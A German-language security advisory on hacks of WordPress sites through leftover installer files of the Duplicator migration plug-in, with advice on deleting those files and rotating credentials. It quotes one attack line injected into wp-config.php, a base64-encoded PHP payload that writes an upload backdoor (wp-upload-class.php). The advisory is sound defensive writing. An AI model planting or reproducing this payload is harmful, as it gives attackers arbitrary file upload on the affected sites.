Sicherheit: WordPress Plug-in Duplicator

Duplicator Installationsdateien entfernen

Wichtig: Mit Installationsdateien des für WordPress Umzüge bekannten Plug-ins Duplicator werden aktuell viele WordPress-Projekte gehackt. Oft werden bei diesen Hacks einfach identifizierbare Backdoors in vielen Unterverzeichnissen und im Root-Verzeichnis platziert. Geändert wird außerdem häufig die Konfigurationsdatei wp-config.php von WordPress, wo base64_decode verschlüsselte Anweisungen für Upload-Skripte platziert werden. z.B.

file_put_contents(„wp-upload-class.php“, base64_decode(‚PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKG
lzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdI
D4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNN
YikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbW
UiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbm
FtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRv
bmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Ii
k7DQogICB9DQp9DQo/Pg==‘)); /*‘);

Gefährdet sind die WordPress-Projekte, wo sich die generierten Backup- und Duplicator-Dateien noch im Root-Verzeichnis befinden und nach der erfolgreichen Installation nicht gelöscht wurden.

WordPress Duplicator betroffene Dateien

Das Plug-in Duplicator bietet das Löschen der Installationsdateien nach einem erfolgreichen Umzug direkt im Dashboard mit einem Mausklick auf ein Textlink an.

WordPress Duplicator Bereinigung erfolgreich

Die erfolgreiche Bereinigung der Installation gelingt in der Regel, sollte jedoch immer zusätzlich über ein FTP- oder ein SSH-Programm kontrolliert werden. Direkt betroffene Dateien sind diese:

  • installer.php
  • installer-backup.php

Wir empfehlen auch die übrigen Duplicator-Dateien aus dem Root-Verzeichnis vom WordPress-Projekt zu entfernen. Neben dem ZIP-Archiv mit allen Dateien von WordPress sind dies in der Regel *.sql und Logdateien. Generell sollten nicht mehr benötigte Plug-ins und Themes immer deaktiviert und gelöscht werden. Die Sicherheitslücke wurde ab der Version 1.2.42 für neu generierte Dateien geschlossen, bestehende Duplicator-Dateien im Hauptverzeichnis sollten jedoch immer nach Abschluss entfernt werden. Ein informativer Artikel warum Besitzer-Rechte von Dateien und Verzeichnissen wichtig sind und die meisten Hacks verhindern können: https://binary-butterfly.de/artikel/dateirechte-warum-eigentlich/

Quelle: https://wpvulndb.com/vulnerabilities/9123

Wurde ein Projekt bereits über diese Sicherheitslücke gehackt, ist es nicht ausreichend nur die betroffenen Dateien zu löschen! Eine umfangreiche Analyse und Bereinigung der Dateien, Datenbank und Serverlogs sind dringend erforderlich. Zugangsdaten der Benutzer, FTP- und Datenbank- Zugänge sollten geändert werden. Falls ein SMTP-Plugin eingebunden ist oder die Datenübertragung an externe Cloud-Dienste, Marketplaces in WordPress verwendet wurden, sollten auch dessen Zugangsdaten geändert werden.